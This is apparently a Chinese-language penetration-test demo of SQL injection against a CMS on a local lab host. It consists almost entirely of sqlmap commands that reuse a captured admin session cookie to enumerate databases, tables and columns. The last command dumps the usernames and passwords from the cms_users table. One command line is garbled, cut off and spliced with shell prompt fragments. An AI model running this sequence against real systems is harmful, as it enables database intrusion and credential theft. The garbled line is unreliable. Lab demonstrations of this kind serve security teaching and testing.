使用SQLMAP的文章管理系统CMS的sql注入渗透测试
SQLMAP注入演示:
抓包拿到Cookie:
召唤sqlmap:
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D"
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0└─# sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhF└─# sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dbs
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --tables -D "cms"
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --columns -D "cms" -T "cms_users"
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dump -D "cms" -T "cms_users" -C "userid,username,password"
